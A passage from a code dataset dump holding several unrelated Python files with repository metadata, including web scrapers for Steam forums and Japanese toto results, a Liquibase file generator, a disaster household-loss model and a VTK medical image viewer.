post.css(\".forum_op_author ::attr(href)\").get()\n body = post.css(\".forum_op .content ::text\").getall()\n time = post.css(\".date ::attr(data-timestamp)\").get()\n else:\n author = post.css(\".commentthread_author_link ::text\").getall()[1]\n author_url = post.css(\".commentthread_author_link ::attr(href)\").get()\n body = post.css(\".commentthread_comment_text ::text\").getall()\n time = post.css(\".commentthread_comment_timestamp ::attr(data-timestamp)\").get()\n forum = response.css(\".breadcrumbs a:nth-child(1) ::text\").get()\n body_url = response.url\n yield {\n \"forum\": forum,\n \"author\": author,\n \"author_url\": author_url,\n \"body\": body,\n \"body_url\": body_url,\n \"post_id\": id_,\n \"time\": time,\n }\n","repo_name":"Slayer2084/SteamScraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28193605838","text":"\"\"\"Bartlett's trasmission chain experiment from Remembering (1932).\"\"\"\n\nfrom wallace.networks import Chain\nfrom wallace.nodes import Source\nfrom wallace.experiments import Experiment\nimport random\n\n\nclass Bartlett1932(Experiment):\n \"\"\"Define the structure of the experiment.\"\"\"\n\n def __init__(self, session):\n \"\"\"Call the same function in the super (see experiments.py in wallace).\n\n A few properties are then overwritten.\n Finally, setup() is called.\n \"\"\"\n super(Bartlett1932, self).__init__(session)\n self.experiment_repeats = 1\n self.setup()\n\n def setup(self):\n \"\"\"Setup the networks.\n\n Setup only does stuff if there are no networks, this is so it only\n runs once at the start of the experiment. It first calls the same\n function in the super (see experiments.py in wallace). Then it adds a\n source to each network.\n \"\"\"\n if not self.networks():\n super(Bartlett1932, self).setup()\n for net in self.networks():\n WarOfTheGhostsSource(network=net)\n\n def create_network(self):\n \"\"\"Return a new network.\"\"\"\n return Chain(max_size=3)\n\n def add_node_to_network(self, node, network):\n \"\"\"Add node to the chain and receive transmissions.\"\"\"\n network.add_node(node)\n parent = node.neighbors(direction=\"from\")[0]\n parent.transmit()\n node.receive()\n\n def recruit(self):\n \"\"\"Recruit one participant at a time until all networks are full.\"\"\"\n if self.networks(full=False):\n self.recruiter().recruit_participants(n=1)\n else:\n self.recruiter().close_recruitment()\n\n\nclass WarOfTheGhostsSource(Source):\n \"\"\"A Source that reads in a random story from a file and transmits it.\"\"\"\n\n __mapper_args__ = {\n \"polymorphic_identity\": \"war_of_the_ghosts_source\"\n }\n\n def _contents(self):\n \"\"\"Define the contents of new Infos.\n\n transmit() -> _what() -> create_information() -> _contents().\n \"\"\"\n stories = [\n \"ghosts.md\",\n \"cricket.md\",\n \"moochi.md\",\n \"outwit.md\",\n \"raid.md\",\n \"species.md\",\n \"tennis.md\",\n \"vagabond.md\"\n ]\n story = random.choice(stories)\n with open(\"static/stimuli/{}\".format(story), \"r\") as f:\n return f.read()\n","repo_name":"berkeley-cocosci/Wallace","sub_path":"examples/bartlett1932/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"}
+{"seq_id":"22239608101","text":"class Solution:\n # @param strs, a list of strings\n # @return a list of strings\n def anagrams(self, strs):\n if len(strs) == 0:\n return []\n strHash = {}\n for str in strs:\n sorted_str = ''.join(sorted(str))\n if sorted_str in strHash:\n strHash[sorted_str].append(str)\n else:\n strHash[sorted_str] = [str]\n results = []\n for key in strHash:\n if len(strHash[key]) > 1:\n results.extend(strHash[key])\n return results","repo_name":"zhexiong/LTC","sub_path":"anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19067035614","text":"import time\nfrom mako import exceptions\nfrom datetime import datetime\nfrom mako.template import Template\n\nDELAY_SEC = 1\n\ntableList = [\n 'employee',\n 'employee_posting',\n 'permission',\n 'permission_parent',\n 'role',\n 'role_action',\n 'service_action',\n 'user_temp',\n]\n\ndef get_current_time():\n now = datetime.now()\n current_time = now.strftime(\"%Y%m%d%H%M%S\")\n return current_time\n\ndef create_not_null_xml(xmlFile, content):\n path = '/home/eatl/python/liquibase-out/'\n f = open(path + xmlFile, \"w\")\n f.write(content)\n f.close()\n\ndef get_table_name(dbTable):\n parts = dbTable.split('_')\n parts = [x.title() for x in parts]\n return ''.join(parts)\n\ndef create_master_file():\n path = '/home/eatl/python/liquibase-out/master/'\n f = open(path + 'master.xml', \"w\")\n f.write('')\n f.close()\n\ndef generate_master_xml(xmlFile):\n content = '\\n'\n \n path = '/home/eatl/python/liquibase-out/master/'\n f = open(path + 'master.xml', \"a\")\n f.write(content)\n f.close()\n\ndef generate_liquibase_files(table_name):\n curr_time = get_current_time()\n dictionary = {\n 'current_time': curr_time,\n 'action': 'AddNotNull',\n 'author_name': 'roy',\n 'table_name': table_name,\n }\n\n template = Template(filename='/home/eatl/python/not-null-liquibase-template.xml')\n xmlFile = curr_time + '-add-not_null-constraint-on-' + get_table_name(table_name) + '.xml'\n content = template.render(**dictionary)\n create_not_null_xml(xmlFile, content)\n print('-> Generated: ' + xmlFile)\n generate_master_xml(xmlFile)\n time.sleep(DELAY_SEC)\n\ntry:\n create_master_file()\n for table_name in tableList:\n generate_liquibase_files(table_name)\n print('~~ File Generation Successful! ~~')\nexcept:\n print(exceptions.text_error_template().render())\n","repo_name":"shikhor-eatl/liquibase-file-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9241780956","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jngt\n\"\"\"\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport re, zenhan, json\n\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.common.keys import Keys\n\ndef get_toto_info(flag, now):\n \"\"\"\n * get toto info from toto web site\n flag : type of toto\n now : how many times\n out : game info pandas\n \"\"\"\n toto_type = ['toto', 'minitotoA', 'minitotoB']\n big_type = ['BIG', 'HyakuenBig', 'BIG1000', 'miniBIG']\n with open(\"app/json/team.json\", 'r') as f:\n team_name = json.load(f)\n home_team = []\n away_team = []\n if flag in toto_type:\n tototag = {'toto':'tabCont01', 'minitotoA':'tabCont06', 'minitotoB':'tabCont07'}\n n_game = {'toto':13, 'minitotoA':5, 'minitotoB':5}\n url = 'https://sp.toto-dream.com/dcs/subos/screen/si01/ssin026/PGSSIN02601InittotoSP.form?holdCntId=' + now\n r = requests.get(url)\n soup = BeautifulSoup(r.text, \"html.parser\")\n tab = soup.find('div', id=tototag[flag])\n rows = tab.find_all('tr')\n for nr in range(4, 4+n_game[flag]):\n tds = rows[nr].find_all('td')\n teams = tds[3].get_text().replace(' ', '').replace('\\r\\n', '').replace('\\u3000', '').split('VS')\n home = zenhan.z2h(teams[0])\n away = zenhan.z2h(teams[1])\n home_team.append(team_name[home] if home in team_name.keys() else home)\n away_team.append(team_name[away] if away in team_name.keys() else away)\n elif flag in big_type:\n bignum = {'BIG':'09', 'HyakuenBig':'13', 'BIG1000':'11', 'miniBIG':'10'}\n n_game = {'BIG':14, 'HyakuenBig':14, 'BIG1000':11, 'miniBIG':9}\n url = 'https://sp.toto-dream.com/_xs2_/dcs/subos/screen/si02/ssin000/PGSSIN00001InitGameBIGSP.form?holdCntId=' + now + '&commodityId='\n r = requests.get(url + bignum[flag])\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows = soup.find_all('tr')\n for nr in range(4, 4+n_game[flag]):\n tds = rows[nr].find_all('td')\n home = zenhan.z2h(tds[3].get_text())\n away = zenhan.z2h(tds[5].get_text())\n home_team.append(team_name[home] if home in team_name.keys() else home)\n away_team.append(team_name[away] if away in team_name.keys() else away)\n data = {'home' : home_team, 'away' : away_team}\n dict_team = {'F東京' : \"FC東京\", '横浜M' : \"横浜FM\"}\n df = pd.DataFrame(data)\n df = df.replace(dict_team)\n return df\n\ndef get_match_info(toto):\n \"\"\"\n * get match info from yahoo web site\n toto : game info pandas\n \"\"\"\n rows = []\n url = 'https://soccer.yahoo.co.jp/jleague/league/'\n r = requests.get(url + 'j1')\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tbody in soup.find_all(\"tbody\"):\n rows += tbody.find_all(\"tr\", {'class':'last'})\n r = requests.get(url + 'j2')\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows += soup.tbody.find_all(\"tr\")\n r = requests.get(url + 'j3')\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows += soup.tbody.find_all(\"tr\")\n r = requests.get(url + 'yn')\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tbody in soup.find_all(\"tbody\"):\n rows += tbody.find_all(\"tr\")\n score = []\n status = []\n homes = []\n for t in range(len(toto)):\n for row in rows:\n atag = row.find_all(\"a\")\n if len(atag) > 1:\n home = atag[1].get_text()\n if home == toto['home'][t]:\n if atag[4].get_text() == toto['away'][t]:\n homes.append(home)\n score.append(row.find(\"td\", class_=\"score\").find('a').get_text().replace('\\xa0', ''))\n status.append(row.find('small', class_=\"status\").get_text())\n break\n toto[\"score\"] = score\n 
toto[\"status\"] = status\n result = []\n for t in range(len(toto)):\n if toto[\"score\"][t][0].isnumeric():\n score_h = int(toto[\"score\"][t][0])\n score_a = int(toto[\"score\"][t][-1])\n if score_h > score_a:\n result.append('1')\n elif score_h < score_a:\n result.append('2')\n else:\n result.append('0')\n else:\n result.append('-')\n toto[\"result\"] = result\n return toto\n\ndef get_scr_data(flag, now):\n \"\"\"\n * get scraping result\n \"\"\"\n toto = get_toto_info(flag, now)\n toto = get_match_info(toto)\n return toto\n\ndef cat_pred(toto, pred_list):\n \"\"\"\n * cat your prediction\n toto : game info pandas\n pred_list : your prediction list\n \"\"\"\n match_dict = {True : 'O', False : 'X'}\n if not pred_list:\n pred_list = ['_0_' for i in range(len(toto))]\n toto['prediction'] = pred_list\n match = []\n for i in range(len(toto)):\n match.append(toto[\"result\"][i] in toto[\"prediction\"][i].replace('_', ''))\n toto[\"match\"] = match\n n_match = str(toto[\"match\"].sum()) + '/' + str(len(toto[\"match\"]))\n toto[\"match\"] = toto[\"match\"].map(match_dict)\n toto = toto.loc[:, ['home', 'score', 'away', 'status', 'result', 'prediction', 'match']]\n return toto, n_match\n\nif __name__ == '__main__':\n toto, now = get_src_data('miniBIG')\n thtml = toto.to_html(classes='table', index=False)\n\n '''\n # 今の回を取ってくる\n if False:\n options = ChromeOptions()\n options.add_argument('--headless')\n driver = Chrome(options=options)\n url_index = 'https://www.toto-dream.com/toto/index.html'\n driver.get(url_index)\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n rows = soup.tbody.find_all('a')\n next = rows[0].get_text()[1:-1]\n now = str(int(next) - 1)\n driver.close()\n driver.quit()\n elif False:\n now = '1075'\n '''\n","repo_name":"jngt/toto_checker","sub_path":"app/scripts/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25531385372","text":"#!/usr/bin/env python\n\n\"\"\"\nFiles in directory\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport lib_uris\nimport lib_common\nfrom sources_types import CIM_DataFile\nimport lib_util\nfrom lib_properties import pc\n\n# If this is not a directory, should not be displayed.\ndef Usable(entity_type, entity_ids_arr):\n dirNam = entity_ids_arr[0]\n return os.path.isdir(dirNam)\n\n# This returns an url which displays a directory in HTML.\n# This can work only if the HTTP server allows so.\n# Purely experimental.\n# Apache option:\n# Alias /Maison \"C:/Users/rchateau\"\n# \n# Options +Indexes\n# \n#\n# Maybe read Apache configuration ? IIS also allows to browse a directory.\n#\n# Apache Icons: http://127.0.0.1/icons/folder.gif\n# http://127.0.0.1/icons/sound2.gif\n#\n# TODO: This is hard-coded, and should be replaced by a Python CGI server\n# serving this directory.\ndef UrlDirectory( fullDirPath ):\n # sys.stderr.write(\"UrlDirectory fullDirPath=%s\\n\" % fullDirPath)\n dirPrefix = \"C://Users/CurrentUser\"\n if fullDirPath.startswith(dirPrefix):\n shortPath = fullDirPath[ len(dirPrefix) : ]\n shortpathclean = shortPath.replace(\"&\",\"&\")\n dirUrl = \"http://127.0.0.1/Home/\" + shortpathclean\n return lib_common.NodeUrl(dirUrl)\n return None\n\n\n# Used only here.\ndef UriDirectoryDirectScript(dirNam):\n # sys.stderr.write(\"UriDirectoryDirectScript=%s\\n\"%dirNam)\n\n # This should rather have the property pc.property_script, but it must be listed with the files.\n return lib_uris.gUriGen.UriMakeFromScript(\n '/sources_types/CIM_Directory/file_directory.py',\n \"CIM_Directory\", # TODO: NOT SURE: lib_util.ComposeTypes(\"file\",\"dir\"),\n # pc.property_script,\n lib_util.EncodeUri(dirNam))\n\n\ndef Main():\n cgiEnv = lib_common.CgiEnv()\n filNam = cgiEnv.GetId()\n\n # Maybe this is a disk name, on Windows, such as \"A:\", \"C:\" etc...\n if lib_util.isPlatformWindows :\n # Remove the trailing backslash.\n if re.match(r\"^[a-zA-Z]:\\\\$\", filNam):\n filNam = filNam[:2]\n # Add a slash at the end, otherwise it does not work.\n if re.match(\"^[a-zA-Z]:$\", filNam):\n filNam += \"/\"\n\n filNode = lib_common.gUriGen.DirectoryUri(filNam)\n\n grph = cgiEnv.GetGraph()\n\n if lib_util.isPlatformLinux:\n isTopDirectory = filNam == '/'\n elif lib_util.isPlatformWindows:\n # Should be \"E:/\" but in case it would be \"E:\".\n isTopDirectory = (len(filNam) == 2 and filNam[1] == ':') or (len(filNam) == 3 and filNam[1:3] == ':/')\n else:\n isTopDirectory = False\n\n DEBUG(\"file_directory.py filNam=%s isTopDirectory=%d\", filNam, isTopDirectory)\n\n if not isTopDirectory:\n topdir = os.path.dirname(filNam)\n DEBUG(\"topdir=%s\", topdir)\n if topdir:\n topdirNode = lib_common.gUriGen.DirectoryUri(topdir)\n grph.add((topdirNode, pc.property_directory, filNode))\n\n url_mime = UriDirectoryDirectScript( topdir )\n grph.add((topdirNode, pc.property_rdf_data_nolist2, lib_common.NodeUrl(url_mime)))\n\n if os.path.isdir(filNam):\n # sys.stderr.write(\"filNam=%s\\n\"%(filNam))\n\n # In case we do not loop at all, the value must be set.\n dirs = None\n\n # This takes the list of files and directories of this directory, without recursing.\n for subdir, dirs, files in os.walk(filNam):\n break\n\n if dirs == None:\n lib_common.ErrorMessageHtml(\"No files in:\" + filNam)\n\n # Special case if top of the filesystem, on Linux.\n filNam_slash = filNam\n if filNam != \"/\":\n filNam_slash += \"/\"\n\n for one_directory in dirs:\n fullDirPath = filNam_slash + one_directory\n subdirNode 
= lib_common.gUriGen.DirectoryUri(fullDirPath.replace(\"&\",\"&\"))\n grph.add((filNode, pc.property_directory, subdirNode))\n\n url_dir_node = UrlDirectory(fullDirPath)\n if not url_dir_node is None:\n grph.add((subdirNode, pc.property_rdf_data_nolist1, url_dir_node))\n\n url_mime = UriDirectoryDirectScript(fullDirPath)\n grph.add((subdirNode, pc.property_rdf_data_nolist2, lib_common.NodeUrl(url_mime)))\n\n # TODO: If this is a script, checks if this is executable ?\n for one_file in files:\n fullFilePath = filNam_slash + one_file\n # First replace the ampersand, then encode.\n\n fullFilePath = lib_util.urllib_quote(fullFilePath, safe='/:! ')\n\n file_path_replace_encoded = fullFilePath.replace(\"&\", \"&\")\n\n # There might be non-ascii chars, accents etc...\n # filNam='C://Users/Yana\\xeblle \\xe0 la plage.jpg'\n # filNam='C://Users/Yanaelle a la plage.jpg'\n # Typical Graphviz error:\n # Error: not well-formed (invalid token) in line 1\n # ... Yana (e trema) lle et Constantin (a grave accent) Boulogne-sur-Mer.IMG-20190806-WA0000.jpg ...\n\n subfilNode = lib_common.gUriGen.FileUri(file_path_replace_encoded)\n\n grph.add((filNode, pc.property_directory, subfilNode))\n\n CIM_DataFile.AddStat(grph, subfilNode, fullFilePath)\n CIM_DataFile.AddHtml(grph, subfilNode, fullFilePath)\n\n cgiEnv.OutCgiRdf(\"LAYOUT_RECT\", [pc.property_directory])\n # cgiEnv.OutCgiRdf(\"LAYOUT_RECT\", [] )\n\nif __name__ == '__main__':\n Main()\n\n\n","repo_name":"Tiancheng-Luo/survol","sub_path":"survol/sources_types/CIM_Directory/file_directory.py","file_name":"file_directory.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
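Main() in the record above lists only the immediate children of a directory by breaking out of os.walk after its first iteration. next() expresses the same single-level listing without the loop-and-break; a sketch:

import os

def list_one_level(dir_name):
    # The first triple yielded by os.walk is exactly this directory's contents.
    _, dirs, files = next(os.walk(dir_name), (dir_name, [], []))
    return dirs, files

dirs, files = list_one_level(".")
print(dirs, files)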
+{"seq_id":"73572817386","text":"\"\"\"This module is the core of the model. \nIt contains a set of functions that are used to calculate the impact of a disaster on households.\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\n\n\ndef match_assets_and_damage(households: pd.DataFrame, tot_exposed_asset: float, atol: bool) -> pd.DataFrame:\n '''Match assets and expenditure of to the asset damage data.\n\n There can be a mismatch between the asset stock in the household survey and the of the asset stock in the damage data.\n This function adjusts the asset stock and expenditure in the household survey to match the asset damage data.\n\n 1). `k_house_ae` is domicile value divided by the ratio of household expenditure to adult equivalent expenditure (per capita)\n `k_house_ae` = domicile_value / (`hhexp` / `aeexp`)\n 2). `aeexp` is adult equivalent expenditure (per capita)\n 3). `aeexp_house` is `hhexp_house` (household annual rent) / `hhsize_ae`, \n where `hhsize_ae` = `hhexp` / `aeexp`.\n\n Args:\n households (pd.DataFrame): Households.\n total_exposed_asset_stock (float): Total exposed asset stock from the damage data.\n indigence_line (float): Indigence line.\n atol (bool): Absolute tolerance for the comparison of the total exposed asset stock and the total asset stock in the survey.\n\n Returns:\n pd.DataFrame: Households with adjusted assets and expenditure.\n\n Raises:\n ValueError: If the total exposed asset stock is less than the total asset stock in the survey.\n '''\n\n # Get the total asset stock in the survey\n # In simple terms, k_house_ae is the price of a house\n tot_asset_surv = households[[\n 'wgt', 'k_house_ae']].prod(axis=1).sum()\n\n # If the difference is small, return the original households (default atol = 100,000)\n if np.isclose(tot_exposed_asset, tot_asset_surv, atol=atol):\n return households\n else:\n # Save the initial values\n households['k_house_ae_orig'] = households['k_house_ae']\n households['aeexp_orig'] = households['aeexp']\n households['aeexp_house_orig'] = households['aeexp_house']\n\n # Calculate the total asset in the survey\n households['tot_asset_surv'] = tot_asset_surv\n\n # Calculate the scaling factor and adjust the variables\n scaling_factor = tot_exposed_asset / tot_asset_surv\n included_variables = ['k_house_ae', 'aeexp', 'aeexp_house']\n households[included_variables] *= scaling_factor\n poverty_line = households['povline'].iloc[0]\n households['poverty_line_adjusted'] = poverty_line * scaling_factor\n\n # Check the result of the adjustment\n tot_asset_surv_adjusted = households[['wgt', 'k_house_ae']].prod(\n axis=1).sum()\n\n if not np.isclose(tot_exposed_asset, tot_asset_surv_adjusted, atol=1e1):\n raise ValueError(\n 'Total exposed asset stock is not equal to the total asset stock in the survey after adjustment.')\n\n return households\n\n\ndef calculate_pml(households: pd.DataFrame, expected_loss_frac: float) -> pd.DataFrame:\n '''Calculate the probable maximum loss (PML) of households in a district.\n\n PML here is a function of effective capital stock (`k_house_ae`) and expected loss fraction multiplied by the population weight of a household\n\n `k_house_ae` is domicile value divided by the ratio of household expenditure to adult equivalent expenditure (per capita)\n `k_house_ae` = domicile_value / (`hhexp` / `aeexp`)\n\n Args:\n households (pd.DataFrame): Households.\n expected_loss_frac (float): Expected loss fraction.\n\n Returns:\n pd.DataFrame: Households with calculated PML (`pml` column).\n '''\n households['keff'] = 
households['k_house_ae'].copy()\n    district_pml = households[['wgt', 'keff']].prod(\n        axis=1).sum() * expected_loss_frac\n\n    # !: PML is the same for all households in a district\n    households['pml'] = district_pml\n    return households\n\n\ndef calculate_exposure(households: pd.DataFrame, poverty_bias: float, calc_exposure_params: dict) -> pd.DataFrame:\n    '''Calculate the exposure of households.\n\n    Exposure is a function of poverty bias, effective capital stock,\n    vulnerability and probable maximum loss.\n\n    Args:\n        households (pd.DataFrame): Households.\n        poverty_bias (float): Poverty bias, or the string 'random' to draw one at random.\n        calc_exposure_params (dict): Parameters for the exposure calculation.\n\n    Returns:\n        pd.DataFrame: Households with calculated exposure (`fa` column).\n    '''\n    district_pml = households['pml'].iloc[0]\n\n    # Random value for poverty bias\n    if poverty_bias == 'random':\n        if calc_exposure_params['pov_bias_rnd_distr'] == 'uniform':\n            # default 0.5\n            low = calc_exposure_params['pov_bias_rnd_low']\n            # default 1.5\n            high = calc_exposure_params['pov_bias_rnd_high']\n            povbias = np.random.uniform(low, high)\n        else:\n            raise ValueError(\"Only the uniform distribution is currently supported.\")\n    else:\n        povbias = poverty_bias\n\n    # Set poverty bias to 1 for all households\n    households['poverty_bias'] = 1\n\n    # Set poverty bias to povbias for poor households\n    households.loc[households['is_poor'], 'poverty_bias'] = povbias\n\n    # Denominator: the bias- and vulnerability-weighted total asset stock\n    denominator = households[['keff', 'v', 'poverty_bias', 'wgt']].prod(\n        axis=1).sum()\n\n    fa0 = district_pml / denominator\n\n    households['fa'] = fa0 * households['poverty_bias']\n    households.drop('poverty_bias', axis=1, inplace=True)\n    return households\n\n\ndef identify_affected(households: pd.DataFrame, ident_affected_params: dict) -> pd.DataFrame:\n    '''Determine which households are affected.\n\n    Each household is affected with a probability given by the `fa` value\n    calculated in `calculate_exposure`.\n\n    Args:\n        households (pd.DataFrame): Households.\n        ident_affected_params (dict): Parameters for determining affected households.\n\n    Returns:\n        pd.DataFrame: Households with `is_affected` and `asset_loss` columns.\n\n    Raises:\n        ValueError: If no suitable mask was found.\n    '''\n    # Get PML, it is the same for all households\n    district_pml = households['pml'].iloc[0]\n\n    # Allow for a relatively small error\n    delta = district_pml * ident_affected_params['delta_pct']  # default 0.025\n\n    # Check if total asset is less than PML\n    tot_asset_stock = households[['keff', 'wgt']].prod(axis=1).sum()\n    if tot_asset_stock < district_pml:\n        raise ValueError(\n            'Total asset stock is less than PML.')\n\n    low = ident_affected_params['low']  # default 0\n    high = ident_affected_params['high']  # default 1\n\n    # Generate multiple boolean masks at once\n    num_masks = ident_affected_params['num_masks']  # default 2000\n    masks = np.random.uniform(\n        low, high, (num_masks, households.shape[0])) <= households['fa'].values\n\n    # Compute total_asset_loss for each mask\n    asset_losses = (\n        masks * households[['keff', 'v', 'wgt']].values.prod(axis=1)).sum(axis=1)\n\n    # Find the masks that yield a total asset loss within the desired range\n    # (np.where returns a tuple of index arrays, never None, so test its size)\n    mask_indices = np.where((asset_losses >= district_pml - delta) &\n                            (asset_losses <= district_pml + delta))[0]\n\n    # Raise an error if no mask was found\n    if mask_indices.size == 0:\n        raise ValueError(\n            f'Cannot find affected households in {num_masks} iterations.')\n\n    # Select the first mask that satisfies the condition\n    chosen_mask = masks[mask_indices[0]]\n\n    # Assign the chosen mask to the 'is_affected' column of the DataFrame\n    households['is_affected'] = chosen_mask\n\n    # Save the asset loss for each household\n    households['asset_loss'] = households.loc[households['is_affected'], [\n        'keff', 'v', 'wgt']].prod(axis=1)\n    households['asset_loss'] = households['asset_loss'].fillna(0)\n\n    # Check whether the total asset loss is within the desired range\n    tot_asset_loss = households['asset_loss'].sum()\n    if (tot_asset_loss < district_pml - delta) or (tot_asset_loss > district_pml + delta):\n        raise ValueError(\n            f'Total asset loss ({tot_asset_loss}) is not within the desired range.')\n\n    return households\n","repo_name":"mikhailsirenko/unbreakable","sub_path":"unbreakable/modules/households.py","file_name":"households.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
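As a rough usage sketch for the functions above (the column names `wgt`, `k_house_ae`, `aeexp`, `aeexp_house`, `povline` come from the docstrings; the numbers and the import path are illustrative assumptions, not part of the original module):

import pandas as pd
from unbreakable.modules.households import match_assets_and_damage, calculate_pml  # path as given in the repo metadata

# Toy survey of three households; all values are made up
households = pd.DataFrame({
    'wgt': [100.0, 200.0, 150.0],        # population weights
    'k_house_ae': [5e4, 8e4, 6e4],       # house value per adult equivalent
    'aeexp': [2000.0, 3000.0, 2500.0],
    'aeexp_house': [500.0, 700.0, 600.0],
    'povline': [1900.0] * 3,
})

households = match_assets_and_damage(households, tot_exposed_asset=4e7, atol=1e5)
households = calculate_pml(households, expected_loss_frac=0.1)
print(households['pml'].iloc[0])  # district-level PML, identical for every household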
+{"seq_id":"41074587355","text":"from vtk.util.vtkImageImportFromArray import *\nimport vtk\nimport numpy as np\nimport os\nimport pickle\n\n\nclass KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):\n def __init__(self, parent, viewer, *args, **kwargs):\n super(KeyPressInteractorStyle).__init__(*args, **kwargs)\n self.parent = vtk.vtkRenderWindowInteractor()\n if parent is not None:\n self.parent = parent\n\n # print('key press')\n self.AddObserver(\"KeyPressEvent\", viewer.keypressFun)\n\n\nclass MedicalImageWindow:\n\n def __init__(self):\n self.renWin = vtk.vtkRenderWindow()\n\n self.renWinInteractor = vtk.vtkRenderWindowInteractor()\n self.renWinInteractor.SetRenderWindow(self.renWin)\n\n self.renWin.SetSize(450, 300)\n\n self.camera = vtk.vtkCamera()\n\n pos = (0, 0, 1, 1)\n\n self.render = vtk.vtkRenderer()\n self.render.SetBackground(0.8, 0.8, 0.8)\n self.render.SetActiveCamera(self.camera)\n self.render.SetViewport(*pos)\n\n self.viewer = MedicalImageViewer(self.renWin, self.renWinInteractor, self.render)\n\n def startWindow(self):\n\n self.render.ResetCamera()\n self.renWin.AddRenderer(self.render)\n self.renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(None, self.viewer))\n self.renWin.Render()\n self.renWinInteractor.Start()\n\n self.renWinInteractor.GetRenderWindow().Finalize()\n self.renWinInteractor.TerminateApp()\n del self.render\n del self.renWin\n del self.renWinInteractor\n\n\nclass MedicalImageViewer:\n def __init__(self, renWin, renWinInteractor, render):\n self.renWin = renWin\n self.renWinInteractor = renWinInteractor\n self.render = render\n\n self.minGrayValue = 0\n self.maxGrayValue = 10\n\n self.currentMin, self.currentMax = self.minGrayValue, self.maxGrayValue\n\n self.volumeProperty_src = vtk.vtkVolumeProperty()\n self.volumeProperty_seg = vtk.vtkVolumeProperty()\n self.src_arr = vtkImageImportFromArray()\n self.seg_arr = vtkImageImportFromArray()\n self.extractVOI_src = vtk.vtkExtractVOI()\n self.extractVOI_seg = vtk.vtkExtractVOI()\n self.dims = []\n self.info = []\n self.slicesActors = []\n self.slicesMappers = []\n\n self.segOpacity = 0.2\n\n self.showImage = True\n self.showLabel = True\n\n def addSrc(self, numpyImage_src, spacing=(1.0, 1.0, 1.0)):\n \"\"\"\n :param numpyImage_src:\n :param spacing: z,y,x\n :return:\n \"\"\"\n # print(\"addSrc\")\n self.info.append('addSrc')\n # print('shape of data ', numpyImage_src.shape, \"reversed spacing\", tuple(reversed(spacing)))\n\n numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)\n numpyImage_src = self.maxGrayValue * numpyImage_src / np.max(numpyImage_src)\n # print('minValue, maxValue', self.minGrayValue, self.maxGrayValue)\n\n self.src_arr.SetArray(numpyImage_src)\n self.src_arr.SetDataSpacing(tuple(reversed(spacing)))\n self.src_arr.SetDataOrigin((0, 0, 0))\n self.src_arr.Update()\n\n tcfun = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun\n tcfun.AddPoint(self.minGrayValue, 0.0)\n tcfun.AddPoint(self.maxGrayValue, 1.0)\n\n gradtfun = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun\n gradtfun.AddPoint(0.0, 0.3)\n gradtfun.AddPoint(0.2, 0.4)\n gradtfun.AddPoint(0.6, 0.6)\n gradtfun.AddPoint(1.0, 1.0)\n\n ctfun = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun\n # ctfun.AddRGBPoint(self.minGrayValue, 0.0, 0.0, 0.0)\n # ctfun.AddRGBPoint(self.maxGrayValue, 1.0, 1.0, 1.0)\n ctfun.AddRGBPoint(self.minGrayValue, 0.0, 0.0, 0.0)\n ctfun.AddRGBPoint(self.maxGrayValue, 0.6, 0.6, 0.6)\n\n outline = vtk.vtkOutlineFilter()\n 
outline.SetInputConnection(self.src_arr.GetOutputPort())\n outlineMapper = vtk.vtkPolyDataMapper()\n outlineMapper.SetInputConnection(outline.GetOutputPort())\n outlineActor = vtk.vtkActor()\n outlineActor.SetMapper(outlineMapper)\n\n self.dims = self.src_arr.GetOutput().GetDimensions()\n # print(self.dims)\n\n self.extractVOI_src.SetInputConnection(self.src_arr.GetOutputPort())\n self.extractVOI_src.SetVOI(0, self.dims[0] - 1, 0, self.dims[1] - 1, 0, self.dims[2] - 1)\n self.extractVOI_src.Update()\n\n # print(self.extractVOI_src.GetOutput().GetDimensions())\n\n volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper()\n volumeMapper_src.SetInputData(self.extractVOI_src.GetOutput())\n\n self.volumeProperty_src.SetColor(ctfun)\n self.volumeProperty_src.SetScalarOpacity(tcfun)\n self.volumeProperty_src.SetGradientOpacity(gradtfun)\n self.volumeProperty_src.SetInterpolationTypeToLinear()\n self.volumeProperty_src.ShadeOn()\n\n render_volume = vtk.vtkVolume()\n render_volume.SetMapper(volumeMapper_src)\n render_volume.SetProperty(self.volumeProperty_src)\n\n # self.render.AddActor(outlineActor)\n self.render.AddVolume(render_volume)\n\n def addGrayScaleSliderToRender(self):\n # print(\"addGrayScaleSliderToRender\")\n self.info.append(\"addGrayScaleSliderToRender\")\n count = 1\n sliderRep_min = 